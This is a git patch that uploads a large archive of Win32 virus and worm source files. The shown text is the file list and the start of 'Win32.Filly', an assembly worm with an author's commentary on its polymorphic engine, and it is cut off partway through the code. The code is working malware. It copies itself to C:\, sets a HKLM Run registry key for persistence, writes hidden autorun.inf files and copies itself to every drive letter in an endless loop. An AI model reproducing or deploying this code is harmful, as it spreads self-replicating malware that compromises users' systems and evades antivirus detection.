From 3cac606e5f340bc609f39eac0f3c9c081420c0a1 Mon Sep 17 00:00:00 2001 
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Sat, 10 Oct 2020 22:07:43 -0500
Subject: [PATCH] Add files via upload

---
Win32/Virus.Win32.Filly.txt | 1960 +++++
Win32/Virus.Win32.Ming.asm | 1028 +++
Win32/Virus.Win32.Spot.asm | 534 ++
Win32/Virus.WinREG.Antireg.b | 13 +
Win32/Virus.WinREG.Sptohell | 24 +
Win32/Virus.WinREG.Sptohell.b | 14 +
Win32/Win32.99WaysToDie.asm | 1886 +++++
Win32/Win32.Abigor.ASM | 8857 ++++++++++++++++++++
Win32/Win32.Alicia.asm | 3312 ++++++++
Win32/Win32.Alma.asm | 1125 +++
Win32/Win32.Apathy.asm | 825 ++
Win32/Win32.Aris.asm | 1977 +++++
Win32/Win32.Astrix.asm | 2101 +++++
Win32/Win32.Atav.asm | 760 ++
Win32/Win32.Ataxia.asm | 341 +
Win32/Win32.Bebop.asm | 634 ++
Win32/Win32.Benny.asm | 994 +++
Win32/Win32.Blaster.cpp | 1351 ++++
Win32/Win32.Bodom.asm | 561 ++
Win32/Win32.Bogus.4096.asm | 193 +
Win32/Win32.Borges2.asm | 704 ++
Win32/Win32.Broken_face.asm | 342 +
Win32/Win32.Butterflies.asm | 250 +
Win32/Win32.CJD.asm | 12102 +++++++++++++++++++++++++++
Win32/Win32.Cabanas.2999.asm | 2642 ++++++
Win32/Win32.Carume.asm | 381 +
Win32/Win32.Ceel.a.asm | 624 ++
Win32/Win32.Chthon.asm | 1810 +++++
Win32/Win32.Cichosz.asm | 328 +
Win32/Win32.Clear.asm | 443 +
Win32/Win32.Cleevix.asm | 717 ++
Win32/Win32.Cocaine.asm | 5767 +++++++++++++
Win32/Win32.Crash.asm | 224 +
Win32/Win32.Crucio.asm | 729 ++
Win32/Win32.Crypto.asm | 8659 ++++++++++++++++++++
Win32/Win32.DDoS.asm | 2363 ++++++
Win32/Win32.Darling.asm | 944 +++
Win32/Win32.Demiurg.asm | 3633 +++++++++
Win32/Win32.Dengue.asm | 7158 ++++++++++++++++
Win32/Win32.Diablerie.asm | 1458 ++++
Win32/Win32.Dream.asm | 1844 +++++
Win32/Win32.Efishnc.asm | 3420 ++++++++
Win32/Win32.Efishnc.b.asm | 2817 +++++++
Win32/Win32.Efishnc.c.asm | 2852 +++++++
Win32/Win32.Egypt.asm | 2467 ++++++
Win32/Win32.Elkern.c.asm | 2579 ++++++
Win32/Win32.Emotion.asm | 267 +
Win32/Win32.Enumero.asm | 1173 +++
Win32/Win32.Eva.asm | 686 ++
Win32/Win32.Fever.asm | 7158 ++++++++++++++++
Win32/Win32.FleA.asm | 82 +
Win32/Win32.Fleabot.asm | 1192 +++
Win32/Win32.Fly.asm | 1037 +++
Win32/Win32.Foroux.a.asm | 2579 ++++++
Win32/Win32.Freebird.asm | 2259 ++++++
Win32/Win32.Gaybar.asm | 420 +
Win32/Win32.Gemini.asm | 1998 +++++
Win32/Win32.Georgina.3657.asm | 1124 +++
Win32/Win32.H0rtiga.asm | 1606 ++++
Win32/Win32.Halen.asm | 961 +++
Win32/Win32.Harrier.asm | 3750 +++++++++
Win32/Win32.Hatred.asm | 3153 ++++++++
Win32/Win32.Heathen.asm | 2939 +++++++
Win32/Win32.HempHoper.asm | 4949 ++++++++++++
Win32/Win32.Heretic.asm | 882 ++
Win32/Win32.Hiv.asm | 2814 +++++++
Win32/Win32.Hortiga.asm | 1640 ++++
Win32/Win32.Idele.asm | 1788 ++++
Win32/Win32.Idyll.1556.asm | 689 ++
Win32/Win32.Imports.asm | 1106 +++
Win32/Win32.Infancy.asm | 565 ++
Win32/Win32.Infinite.asm | Bin 0 -> 36009 bytes
Win32/Win32.Insomnia.txt | 468 ++
Win32/Win32.Isis.asm | 964 +++
Win32/Win32.Jacky.1440.asm | 1153 +++
Win32/Win32.Jeremy.asm | 354 +
Win32/Win32.Jimmy.asm | 820 ++
Win32/Win32.Junkhtmail.asm | 3381 ++++++++
Win32/Win32.KaZaM.asm | 1695 ++++
Win32/Win32.Karazakira.asm | 567 ++
Win32/Win32.Kenston.asm | 772 ++
Win32/Win32.Kriz.asm | 2804 +++++++
Win32/Win32.LadyMarian.2.asm | 773 ++
Win32/Win32.LaraCroft.asm | 249 +
Win32/Win32.Legacy.asm | 5676 +++++++++++++
Win32/Win32.Leviathan.asm | 1312 +++
Win32/Win32.Linda.asm | 370 +
Win32/Win32.LittleRiot.asm | 54 +
Win32/Win32.Magic.7045.asm | 655 ++
Win32/Win32.Mates.asm | 452 ++
Win32/Win32.Maya.4153.asm | 1121 +++
Win32/Win32.Maya.asm | 1319 +++
Win32/Win32.Mescaline.asm | 657 ++
Win32/Win32.Metaphor.asm | 13914 ++++++++++++++++++++++++++++++++
Win32/Win32.Morw.asm | 994 +++
Win32/Win32.Mutt.asm | 1307 +++
Win32/Win32.Nachtklinge.asm | 694 ++
Win32/Win32.Neo.asm | 1202 +++
Win32/Win32.Netscan.c | 245 +
Win32/Win32.borges.asm | 213 +
100 files changed, 186749 insertions(+)
create mode 100644 Win32/Virus.Win32.Filly.txt
create mode 100644 Win32/Virus.Win32.Ming.asm
create mode 100644 Win32/Virus.Win32.Spot.asm
create mode 100644 Win32/Virus.WinREG.Antireg.b
create mode 100644 Win32/Virus.WinREG.Sptohell
create mode 100644 Win32/Virus.WinREG.Sptohell.b
create mode 100644 Win32/Win32.99WaysToDie.asm
create mode 100644 Win32/Win32.Abigor.ASM
create mode 100644 Win32/Win32.Alicia.asm
create mode 100644 Win32/Win32.Alma.asm
create mode 100644 Win32/Win32.Apathy.asm
create mode 100644 Win32/Win32.Aris.asm
create mode 100644 Win32/Win32.Astrix.asm
create mode 100644 Win32/Win32.Atav.asm
create mode 100644 Win32/Win32.Ataxia.asm
create mode 100644 Win32/Win32.Bebop.asm
create mode 100644 Win32/Win32.Benny.asm
create mode 100644 Win32/Win32.Blaster.cpp
create mode 100644 Win32/Win32.Bodom.asm
create mode 100644 Win32/Win32.Bogus.4096.asm
create mode 100644 Win32/Win32.Borges2.asm
create mode 100644 Win32/Win32.Broken_face.asm
create mode 100644 Win32/Win32.Butterflies.asm
create mode 100644 Win32/Win32.CJD.asm
create mode 100644 Win32/Win32.Cabanas.2999.asm
create mode 100644 Win32/Win32.Carume.asm
create mode 100644 Win32/Win32.Ceel.a.asm
create mode 100644 Win32/Win32.Chthon.asm
create mode 100644 Win32/Win32.Cichosz.asm
create mode 100644 Win32/Win32.Clear.asm
create mode 100644 Win32/Win32.Cleevix.asm
create mode 100644 Win32/Win32.Cocaine.asm
create mode 100644 Win32/Win32.Crash.asm
create mode 100644 Win32/Win32.Crucio.asm
create mode 100644 Win32/Win32.Crypto.asm
create mode 100644 Win32/Win32.DDoS.asm
create mode 100644 Win32/Win32.Darling.asm
create mode 100644 Win32/Win32.Demiurg.asm
create mode 100644 Win32/Win32.Dengue.asm
create mode 100644 Win32/Win32.Diablerie.asm
create mode 100644 Win32/Win32.Dream.asm
create mode 100644 Win32/Win32.Efishnc.asm
create mode 100644 Win32/Win32.Efishnc.b.asm
create mode 100644 Win32/Win32.Efishnc.c.asm
create mode 100644 Win32/Win32.Egypt.asm
create mode 100644 Win32/Win32.Elkern.c.asm
create mode 100644 Win32/Win32.Emotion.asm
create mode 100644 Win32/Win32.Enumero.asm
create mode 100644 Win32/Win32.Eva.asm
create mode 100644 Win32/Win32.Fever.asm
create mode 100644 Win32/Win32.FleA.asm
create mode 100644 Win32/Win32.Fleabot.asm
create mode 100644 Win32/Win32.Fly.asm
create mode 100644 Win32/Win32.Foroux.a.asm
create mode 100644 Win32/Win32.Freebird.asm
create mode 100644 Win32/Win32.Gaybar.asm
create mode 100644 Win32/Win32.Gemini.asm
create mode 100644 Win32/Win32.Georgina.3657.asm
create mode 100644 Win32/Win32.H0rtiga.asm
create mode 100644 Win32/Win32.Halen.asm
create mode 100644 Win32/Win32.Harrier.asm
create mode 100644 Win32/Win32.Hatred.asm
create mode 100644 Win32/Win32.Heathen.asm
create mode 100644 Win32/Win32.HempHoper.asm
create mode 100644 Win32/Win32.Heretic.asm
create mode 100644 Win32/Win32.Hiv.asm
create mode 100644 Win32/Win32.Hortiga.asm
create mode 100644 Win32/Win32.Idele.asm
create mode 100644 Win32/Win32.Idyll.1556.asm
create mode 100644 Win32/Win32.Imports.asm
create mode 100644 Win32/Win32.Infancy.asm
create mode 100644 Win32/Win32.Infinite.asm
create mode 100644 Win32/Win32.Insomnia.txt
create mode 100644 Win32/Win32.Isis.asm
create mode 100644 Win32/Win32.Jacky.1440.asm
create mode 100644 Win32/Win32.Jeremy.asm
create mode 100644 Win32/Win32.Jimmy.asm
create mode 100644 Win32/Win32.Junkhtmail.asm
create mode 100644 Win32/Win32.KaZaM.asm
create mode 100644 Win32/Win32.Karazakira.asm
create mode 100644 Win32/Win32.Kenston.asm
create mode 100644 Win32/Win32.Kriz.asm
create mode 100644 Win32/Win32.LadyMarian.2.asm
create mode 100644 Win32/Win32.LaraCroft.asm
create mode 100644 Win32/Win32.Legacy.asm
create mode 100644 Win32/Win32.Leviathan.asm
create mode 100644 Win32/Win32.Linda.asm
create mode 100644 Win32/Win32.LittleRiot.asm
create mode 100644 Win32/Win32.Magic.7045.asm
create mode 100644 Win32/Win32.Mates.asm
create mode 100644 Win32/Win32.Maya.4153.asm
create mode 100644 Win32/Win32.Maya.asm
create mode 100644 Win32/Win32.Mescaline.asm
create mode 100644 Win32/Win32.Metaphor.asm
create mode 100644 Win32/Win32.Morw.asm
create mode 100644 Win32/Win32.Mutt.asm
create mode 100644 Win32/Win32.Nachtklinge.asm
create mode 100644 Win32/Win32.Neo.asm
create mode 100644 Win32/Win32.Netscan.c
create mode 100644 Win32/Win32.borges.asm
diff --git a/Win32/Virus.Win32.Filly.txt b/Win32/Virus.Win32.Filly.txt
new file mode 100644
index 00000000..7bec3775
--- /dev/null
+++ b/Win32/Virus.Win32.Filly.txt
@@ -0,0 +1,1960 @@ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; Win32.Filly +;; by SPTH +;; February 2012 +;; +;; +;; This is a worm which spreads via network/removable/USB drives. +;; +;; It uses a novel polymorphic engine, namely the virusbody is created +;; at runtime using flags. The virusbody does not exist in any encrypted +;; data or transformed code, but just appears as shadow of the execution of +;; some overlayed instruction-flow. +;; +;; Every nibble (half byte) of the virus is represented as a code which +;; sets or clears SF,AF,PF,CF. After the code snippet of one nibble is +;; executed, either LAHF or PUSHFD is used to get the flags. The flags +;; are saved in an allocated memory, which will be executed after +;; the reconstruction. +;; +;; It can use one out of 5 ways to fully determine SF,AF,PF,CF: +;; +;; 5 | 0+4 | 1+4 | 2+4 | 4+0 +;; +;; where each number represents a set of instruction with different behaviour +;; with respect to flags: +;; +;; 0: CF: +;; ROL, ROR +;; +;; 1: AF, CF (PF, SF undefined): +;; AAA, AAS +;; +;; 2: CF PF (AF undefined, SF undefined); +;; SHL, SHR, SAL, SAR +;; +;; 3: PF SF (AF undefined, CF undefined): +;; AND, XOR, TEST +;; +;; 4: AF PF SF: +;; DEC, INC +;; +;; 5: AF CF PF SF: +;; ADD, CMP, NEG, SUB +;; +;; All sets can be used as functional trash code, prior to the actual determining +;; instruction sets. Registers and type (Instr Reg1, Reg2 or Instr Reg1, NNNN) are +;; random in that case. +;; +;; For finding the correct composition of instruction and register values to get +;; the the desired flag combination, I use a semi-deterministic algorithm. This means +;; i give correct flag dependences, the the code goes in a loop searching randomly +;; for correct parameters - for each nibble of the code. 
In some cases, a desired +;; combination of flags can not be created with the choosen instruction - in that case +;; after 42 loops, an infinite-loop handler is called, which exits the loops and choses +;; another instruction to create the flag-combination. This procedere is unexpectedly +;; fast - in fact, even there are ~6100 random loops running, there is no noticeable +;; delay. +;; +;; The encrypted code-flow has a different size each generation. As its boring to code a +;; file size adjustment tool, I keep a constant filesize with following statistical +;; argument: In a set of 20 different files, I looked at the maximum size the used +;; code section: 175713, 175477, 175261, 175262, 177070, 176241, 177109, 175749, 172610, +;; 176471, 174657, 174682, 175275, 176186, 176004, 174359, 173549, 174638, 174684, 173893 bytes. +;; Average of the set: 175269 +/- 1148.65. +;; For padding, I used average + 7 sigma = 183'312. The probability that something +;; goes wrong is 1 / (390'682'215'445), while the probability that everything goes +;; right is 99.999999999744% - this is enough for my taste :) +;; +;; Now here you can see a generated code: +;; +;; 004020B5 . B8 A0AC599E MOV EAX,9E59ACA0 +;; 004020BA . C1E0 82 SHL EAX,82 +;; 004020BD . B8 A5AF1B60 MOV EAX,601BAFA5 +;; 004020C2 . 48 DEC EAX +;; 004020C3 . 9C PUSHFD +;; 004020C4 . 5A POP EDX +;; 004020C5 . 8817 MOV BYTE PTR DS:[EDI],DL +;; 004020C7 . 47 INC EDI +;; 004020C8 . B9 CBC5FCAC MOV ECX,ACFCC5CB +;; 004020CD . B8 550D859F MOV EAX,9F850D55 +;; 004020D2 . 29C1 SUB ECX,EAX +;; 004020D4 . 9C PUSHFD +;; 004020D5 . 58 POP EAX +;; 004020D6 . AA STOS BYTE PTR ES:[EDI] +;; 004020D7 . B8 CB5183AB MOV EAX,AB8351CB +;; 004020DC . B9 EEF33292 MOV ECX,9232F3EE +;; 004020E1 . D3C0 ROL EAX,CL +;; 004020E3 . BA 8B47E2EB MOV EDX,EBE2478B +;; 004020E8 . 4A DEC EDX +;; 004020E9 . 9F LAHF +;; 004020EA . 8827 MOV BYTE PTR DS:[EDI],AH +;; 004020EC . 47 INC EDI +;; 004020ED . BA F065255E MOV EDX,5E2565F0 +;; 004020F2 . 
B9 A5D9FA8B MOV ECX,8BFAD9A5 +;; 004020F7 . 01CA ADD EDX,ECX +;; 004020F9 . B8 8E0FB438 MOV EAX,38B40F8E +;; 004020FE . 3F AAS +;; 004020FF . BB 6B6AF3EA MOV EBX,EAF36A6B +;; 00402104 . B8 7B9CB043 MOV EAX,43B09C7B +;; 00402109 . 01C3 ADD EBX,EAX +;; 0040210B . 9F LAHF +;; 0040210C . 8827 MOV BYTE PTR DS:[EDI],AH +;; 0040210E . 47 INC EDI +;; +;; This code generates 2 bytes of the virus code. +;; +;; +;; +;; Thanks alot to hh86 for telling me about this non-standard code +;; representation she is working on, and for pointing out that LAHF +;; is actually *very* useful :) +;; +;; This is the second member of a new series of self-replicators: +;; - Win32.Kitti (overlapping code engine; in valhalla#1) +;; - Win32.Filly (code as shadow of overlayed instruction flow; in valhalla#2) +;; +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +include 'E:\Programme\FASM\INCLUDE\win32ax.inc' + +.data + hMyFileName dd 0x0 + hFileHandle dd 0x0 + hMapHandle dd 0x0 + hMapViewAddress dd 0x0 + + hFileCodeStart dd 0x0 + + RandomNumber dd 0x0 + + SpaceForHDC: dd 0x0 ; should be 0x0, C:\ + RandomFileName: times 13 db 0x0 + + + SpaceForHDC2: dd 0x0 ; should be 0x0, X:\ + RandomFileName2:times 13 db 0x0 + + stKey: times 47 db 0x0 ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0x0 + hKey dd 0x0 + + + stAutorunWithDrive db 0x0, 0x0, 0x0 ; "X:\" + stAutoruninf: times 12 db 0x0 ; "autorun.inf" + + + + stAutoRunContent: times 52 db 0x0 + + + hCreateFileAR dd 0x0 + hCreateFileMappingAR dd 0x0 + + constFileSize EQU 185344 + constCodeStart EQU 0x400 + + FlagMask db 0x0 ; S00A'0P1C + MaskNibble0 EQU 0000'0001b + MaskNibble1 EQU 0001'0001b + MaskNibble2 EQU 0000'0101b + MaskNibble3 EQU 1000'0100b + MaskNibble4 EQU 1001'0100b + MaskNibble5 EQU 1001'0101b + MaskRandom EQU 0000'0000b ; no content - for trash + + VerifiedAddress dd 0x0 + + + MyStartAddresse dd 0x0 + + NibbleData db 0x0 + + DecryptedCode dd 0x0 + + + +.code +start: +; 
########################################################################### +; ##### +; ##### Preparation (copy file, get kernel, ...) +; ##### + +StartEngine: + call GetMyStartAddresse + GetMyStartAddresse: + pop eax + sub eax, (GetMyStartAddresse-StartEngine) + + mov dword[MyStartAddresse], eax + + + + push 0x8007 + stdcall dword[SetErrorMode] + + stdcall dword[GetCommandLineA] + mov dword[hMyFileName], eax + cmp byte[eax], '"' + jne FileNameIsFine + inc eax + mov dword[hMyFileName], eax + + FindFileNameLoop: + inc eax + cmp byte[eax], '"' + jne FindFileNameLoop + + mov byte[eax], 0x0 + FileNameIsFine: + + + stdcall dword[GetTickCount] + mov dword[RandomNumber], eax + + xor esi, esi + CopyFileAndRegEntryMore: + mov ebx, 26 + mov ecx, 97 + call CreateSpecialRndNumber + + mov byte[RandomFileName+esi], dl + inc esi + cmp esi, 8 + jb CopyFileAndRegEntryMore + + mov eax, ".exe" + mov dword[RandomFileName+esi], eax + + mov al, "C" + mov byte[SpaceForHDC+1], al + mov al, ":" + mov byte[SpaceForHDC+2], al + mov al, "\" + mov byte[SpaceForHDC+3], al + + push FALSE + push SpaceForHDC+1 + push dword[hMyFileName] + stdcall dword[CopyFileA] + + + +; ##### +; ##### Preparation (copy file, get kernel, ...) 
+; ##### +; ########################################################################### + + +; ########################################################################### +; ##### +; ##### Open New File +; ##### + + push 0x0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_ALWAYS + push 0x0 + push 0x0 + push (GENERIC_READ or GENERIC_WRITE) + push SpaceForHDC+1 + stdcall dword[CreateFileA] + + cmp eax, INVALID_HANDLE_VALUE + je IVF_NoCreateFile + mov dword[hFileHandle], eax + + push 0x0 + push constFileSize + push 0x0 ; nFileSizeHigh=0 from above + push PAGE_READWRITE + push 0x0 + push dword[hFileHandle] + stdcall dword[CreateFileMappingA] + + cmp eax, 0x0 + je IVF_NoCreateMap + mov dword[hMapHandle], eax + + push constFileSize + push 0x0 + push 0x0 + push FILE_MAP_WRITE + push dword[hMapHandle] + stdcall dword[MapViewOfFile] + + cmp eax, 0x0 + je IVF_NoMapView + mov dword[hMapViewAddress], eax + +; ##### +; ##### Open New File +; ##### +; ########################################################################### + + call DoNibbleTrafo + + +; ########################################################################### +; ##### +; ##### Close New File +; ##### + + IVF_CloseMapView: + push dword[hMapViewAddress] + stdcall dword[UnmapViewOfFile] + + IVF_NoMapView: + push dword[hMapHandle] + stdcall dword[CloseHandle] + + IVF_NoCreateMap: + push dword[hFileHandle] + stdcall dword[CloseHandle] + + IVF_NoCreateFile: + +; ##### +; ##### Close New File +; ##### +; ########################################################################### + + +; invoke ExitProcess, 0 + +; ########################################################################### +; ##### +; ##### Spread this kitty ;) +; ##### + +SpreadKitty: +; Representation of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" +; One could permute it - but too lazy for doing this task atm :) + + mov eax, stKey + mov dword[eax+0x00], "SOFT" + mov dword[eax+0x04], "WARE" + mov dword[eax+0x08], "\Mic" + mov dword[eax+0x0C], "roso" + 
mov dword[eax+0x10], "ft\W" + mov dword[eax+0x14], "indo" + mov dword[eax+0x18], "ws\C" + mov dword[eax+0x1C], "urre" + mov dword[eax+0x20], "ntVe" + mov dword[eax+0x24], "rsio" + mov dword[eax+0x28], "n\Ru" + mov byte[eax+0x2C], "n" + + push 0x0 + push hKey + push 0x0 + push KEY_ALL_ACCESS + push REG_OPTION_NON_VOLATILE + push 0x0 + push 0x0 + push stKey + push HKEY_LOCAL_MACHINE + stdcall dword[RegCreateKeyExA] + + push 16 + push SpaceForHDC+1 + push REG_SZ + push 0x0 + push 0x0 + push dword[hKey] + stdcall dword[RegSetValueExA] + + push dword[hKey] + stdcall dword[RegCloseKey] + + xor eax, eax + mov dword[stAutorunWithDrive], "X:\a" + mov dword[stAutorunWithDrive+2], "\aut" + mov dword[stAutoruninf+3], "orun" + mov dword[stAutoruninf+7], ".inf" + + mov dword[stAutoRunContent], "[Aut" + mov dword[stAutoRunContent+0x04], "orun" + mov dword[stAutoRunContent+0x08], 0x530A0D5D + mov dword[stAutoRunContent+0x0C], "hell" ; !!!!!!! + mov dword[stAutoRunContent+0x10], "Exec" + mov dword[stAutoRunContent+0x14], "ute=" + mov eax, dword[RandomFileName] ; Filename: XXXXxxxx.exe + mov dword[stAutoRunContent+0x18], eax + mov eax, dword[RandomFileName+0x4] ; Filename: xxxxXXXX.exe + mov dword[stAutoRunContent+0x1C], eax + mov dword[stAutoRunContent+0x20], ".exe" + mov dword[stAutoRunContent+0x24], 0x73550A0D + mov dword[stAutoRunContent+0x28], "eAut" + mov dword[stAutoRunContent+0x2C], "opla" + mov dword[stAutoRunContent+0x30], 0x00313D79 + + ; i like that coding style, roy g biv! 
:)) + push 51 + push 0x0 + push 0x0 + push FILE_MAP_ALL_ACCESS + push 0x0 + push 51 + push 0x0 + push PAGE_READWRITE + push 0x0 + push 0x0 + push FILE_ATTRIBUTE_HIDDEN + push OPEN_ALWAYS + push 0x0 + push 0x0 + push (GENERIC_READ or GENERIC_WRITE) + push stAutoruninf + + stdcall dword[CreateFileA] + push eax + mov dword[hCreateFileAR], eax + stdcall dword[CreateFileMappingA] + push eax + mov dword[hCreateFileMappingAR], eax + stdcall dword[MapViewOfFile] + + xor cl, cl + mov esi, stAutoRunContent + MakeAutoRunInfoMore: + mov bl, byte[esi] + mov byte[eax], bl + inc eax + inc esi + inc ecx + cmp cl, 51 + jb MakeAutoRunInfoMore + + sub eax, 51 + push dword[hCreateFileAR] + push dword[hCreateFileMappingAR] + push eax + stdcall dword[UnmapViewOfFile] + stdcall dword[CloseHandle] + stdcall dword[CloseHandle] + + mov dword[SpaceForHDC2+1], "A:\." + mov eax, dword[RandomFileName] + mov dword[RandomFileName2], eax ; XXXXxxxx.exe + mov eax, dword[RandomFileName+0x04] + mov dword[RandomFileName2+0x04], eax ; xxxxXXXX.exe + mov eax, dword[RandomFileName+0x08] + mov dword[RandomFileName2+0x08], eax ; .exe + + + SpreadKittyAnotherTime: + mov dword[SpaceForHDC2], 0x003A4100 ; 0x0, "A:", 0x0 + + STKAnotherRound: + push SpaceForHDC2+1 + stdcall dword[GetDriveTypeA] + + xor ebx, ebx ; 0 ... No Drive + ; 1 ... Drive (without autorun.inf) + ; 2 ... 
Drive (with autorun.inf) + + mov cl, '\' + mov byte[SpaceForHDC2+3],cl + + + cmp al, 0x2 + je STKWithAutoRun + + cmp al, 0x3 + je STKWithoutAutoRun + + cmp al, 0x4 + je STKWithAutoRun + + cmp al, 0x6 + je STKWithAutoRun + + jmp STKCreateEntriesForNextDrive + + STKWithAutoRun: + + push FALSE + push stAutorunWithDrive + push stAutoruninf + stdcall dword[CopyFileA] + + STKWithoutAutoRun: + + push FALSE + push SpaceForHDC2+1 + push SpaceForHDC+1 + stdcall dword[CopyFileA] + + + STKCreateEntriesForNextDrive: + xor eax, eax + mov al, byte[SpaceForHDC2+1] + cmp al, "Z" + je SpreadThisKittyEnd + + inc al + mov byte[SpaceForHDC2+1], al ; next drive + mov byte[stAutorunWithDrive], al ; next drive + mov byte[SpaceForHDC2+3], ah ; 0x0, "X:", 0x0 + jmp STKAnotherRound + + + SpreadThisKittyEnd: + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, (0x8000 - 1) ; 0-32 sec + + push eax + stdcall dword[Sleep] + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, (0x100-1) + jnz SpreadKittyAnotherTime + +jmp SpreadKittyAnotherTime + +; ##### +; ##### Spread this kitty ;) +; ##### +; ########################################################################### + + + +DoNibbleTrafo: + + mov edi, dword[hMapViewAddress] + add edi, constCodeStart + +;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; First create the VirtualAlloc code and save the value +;; + + virtual at 0 ; cool FASM feature: + ; this compiles code virtually + ; and one can use variables to access it + ; ideal for our purpose :) + invoke VirtualAlloc, 0x0, 100'000, 0x1000, PAGE_EXECUTE_READWRITE + mov dword[DecryptedCode], eax + xchg edi, eax + mov edi, edi ; just for padding... + ; uuhh, do we know this instruction? ;) + + load iVirtualCodeA dword from 0 + load iVirtualCodeB dword from 4 + load iVirtualCodeC dword from 8 + load iVirtualCodeD dword from 12 + load iVirtualCodeE dword from 16 + load iVirtualCodeF dword from 20 + load iVirtualCodeG dword from 24 ; i hate "word", 2byte data-types. 
+ end virtual ; they are just unelegant... + + + mov dword[edi+00], iVirtualCodeA + mov dword[edi+04], iVirtualCodeB + mov dword[edi+08], iVirtualCodeC + mov dword[edi+12], iVirtualCodeD + mov dword[edi+16], iVirtualCodeE + mov dword[edi+20], iVirtualCodeF + mov dword[edi+24], iVirtualCodeG + add edi, 26 + + mov dword[VerifiedAddress], edi + +;; +;; First create the VirtualAlloc code and save the value +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; Now create the whole representation of the code in form of flags +;; of some other random code ( main engine ) +;; + mov esi, dword[MyStartAddresse] + + CreateCodeForAllBytes: + mov al, byte[esi] + + mov byte[NibbleData], al + and byte[NibbleData], 0000'1111b + push esi + call CreateCodeForNibble + pop esi + + mov al, byte[esi] + shr al, 4 ; get the second nibble of this byte + mov byte[NibbleData], al + and byte[NibbleData], 0000'1111b + push esi + call CreateCodeForNibble + pop esi + + inc esi + + mov ebx, dword[MyStartAddresse] + add ebx, (WholeCodeEnd-StartEngine) + cmp esi, ebx + jne CreateCodeForAllBytes + + +;; +;; Now create the whole representation of the code in form of flags +;; of some other random code ( main engine ) +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;;;;;;;; +;; +;; In the end, rearrange the information to extract the viral code +;; + + virtual at 0 + mov ecx, dword[DecryptedCode] + mov edx, ecx + + ReorganizeMore: + mov bh, byte[ecx] + inc ecx + push 0 ; Some PIC workaround :) + jmp Decrypt + ReorganizeFirstNibbleBack: + + and al, 0000'1111b + push eax + + + + mov bh, byte[ecx] + inc ecx + + push 1 + jmp Decrypt + ReorganizeSecondNibbleBack: + + and al, 0000'1111b + shl al, 4 + pop ebx + add al, bl + + mov byte[edx], al + inc edx + mov eax, dword[DecryptedCode] + add eax, (WholeCodeEnd-StartEngine) + + cmp edx, eax + jne ReorganizeMore + + jmp dword[DecryptedCode] + + + Decrypt: + + ; in: bh=S00A'0P1C + ; out: al=0000'SAPC + mov al, bh ; al=S00A'0P1C + and 
al, 0000'0001b ; al=0000'000C + + shr bh, 1 ; bh=0S00'A0P1 + push ebx + and bh, 0000'0010b ; bh=0000'00P0 + add al, bh ; al=0000'00PC + + pop ebx ; bh=0S00'A0P1 + shr bh, 1 ; bh=00S0'0A0P + push ebx + and bh, 0000'0100b ; bh=0000'0A00 + add al, bh ; al=0000'0APC + + pop ebx ; bh=00S0'0A0P + shr bh, 2 ; bh=0000'S00A + and bh, 0000'1000b ; bh=0000'S000 + add al, bh ; al=0000'SAPC + + pop ebx + test ebx, ebx + + jz ReorganizeFirstNibbleBack + jmp ReorganizeSecondNibbleBack + + load cVirtualCodeA dword from 0 ; Most likely there is a more elegant + load cVirtualCodeB dword from 4 ; way to handle this requirement + load cVirtualCodeC dword from 8 ; using a FASM macro. + load cVirtualCodeD dword from 12 + load cVirtualCodeE dword from 16 ; But i couldnt find one - tell me + load cVirtualCodeF dword from 20 ; if you know a way to copy data + load cVirtualCodeG dword from 24 ; to a memory addresse from a + load cVirtualCodeH dword from 28 ; virtual compilation space. + load cVirtualCodeI dword from 32 + load cVirtualCodeJ dword from 36 + load cVirtualCodeK dword from 40 + load cVirtualCodeL dword from 44 + load cVirtualCodeM dword from 48 + load cVirtualCodeN dword from 52 + load cVirtualCodeO dword from 56 + load cVirtualCodeP dword from 60 + load cVirtualCodeQ dword from 64 + load cVirtualCodeR dword from 68 + load cVirtualCodeS dword from 72 + load cVirtualCodeT dword from 76 + load cVirtualCodeU dword from 80 + load cVirtualCodeV dword from 84 + load cVirtualCodeW dword from 88 + load cVirtualCodeX byte from 92 + + end virtual + + mov dword[edi+00], cVirtualCodeA + mov dword[edi+04], cVirtualCodeB + mov dword[edi+08], cVirtualCodeC + mov dword[edi+12], cVirtualCodeD + mov dword[edi+16], cVirtualCodeE + mov dword[edi+20], cVirtualCodeF + + mov dword[edi+24], cVirtualCodeG + mov dword[edi+28], cVirtualCodeH + mov dword[edi+32], cVirtualCodeI + mov dword[edi+36], cVirtualCodeJ + mov dword[edi+40], cVirtualCodeK + + mov dword[edi+44], cVirtualCodeL + mov dword[edi+48], 
cVirtualCodeM + mov dword[edi+52], cVirtualCodeN + mov dword[edi+56], cVirtualCodeO + mov dword[edi+60], cVirtualCodeP + + mov dword[edi+64], cVirtualCodeQ + mov dword[edi+68], cVirtualCodeR + mov dword[edi+72], cVirtualCodeS + mov dword[edi+76], cVirtualCodeT + mov dword[edi+80], cVirtualCodeU + + mov dword[edi+84], cVirtualCodeV + mov dword[edi+88], cVirtualCodeW + mov byte[edi+92], cVirtualCodeX + +;; +;; In the end, rearrange the information to extract the viral code +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +ret + + +CreateCodeForNibble: +; 5 possible algos: +; -> 5 +; -> 0+4 | 1+4 |2+4 +; -> 4+0 + + + CreateCodeBeginTrash: + call GetRandomNumber + test byte[RandomNumber+1], 0000'0011b + jnz DoNibbleFindAlgo_NoTrashBegin + mov byte[FlagMask], MaskRandom + mov bl, byte[RandomNumber+2] + call GetRandomNumber + + mov al, byte[RandomNumber] + and al, 0000'0111b + + jz GC_Trash_Not0 + call GenerateNibble0 + jmp CreateCodeBeginTrash + + GC_Trash_Not0: + dec al + jz GC_Trash_Not1 + call GenerateNibble1 + jmp 